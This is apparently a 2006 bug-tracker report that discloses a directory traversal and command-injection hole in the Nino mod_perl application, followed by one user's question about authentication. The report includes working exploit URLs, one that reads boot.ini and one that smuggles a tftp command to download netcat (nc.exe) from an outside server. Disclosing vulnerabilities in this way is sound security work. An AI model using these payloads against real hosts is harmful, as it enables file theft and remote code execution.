Menu

#1 Security Vulnerability in Nino

open
nobody
None
9
2006-04-03
2006-04-03
richh22
No

Nino contains a security issue which allows a
malicious user to retrieve files and execute commands
against the host running Nino. The following URL
shows how a directory transversal vulnerability can
be used to retrieve files that are not usually
accessible:

http://<target>/mod_perl/nino.pl?
action=reporttraffic&template=../../../../../../../../
../boot.ini&year=2006

The above URL retrieves the boot.ini file from the
host running Nino. It is mitigated slightly by the
fact this bug is post-authentication.

Also the same URL can be used to execute code on the
host:

http://<target>/mod_perl/nino.pl?
action=reporttraffic&template=../../../../../../../../
../winnt/system32/tftp.exe -i <tftp server> get
nc.exe nc.exe|&year=2006

This executes tftp.exe to connect to a tftp server
and download the file nc.exe and save it.

Discussion

  • richh22

    richh22 - 2006-04-03
    • priority: 5 --> 9
     
  • Saurabh Dubey

    Saurabh Dubey - 2006-06-19

    Logged In: YES
    user_id=1388752

    Hi,

    Just read about this vulnerability. This functionality
    still has to go through a username password authentication
    or does it execute without them??

    I am also looking for something like an analyses of Nino's
    deployment and scalability.

    Regards,
    Saurabh

     

Log in to post a comment.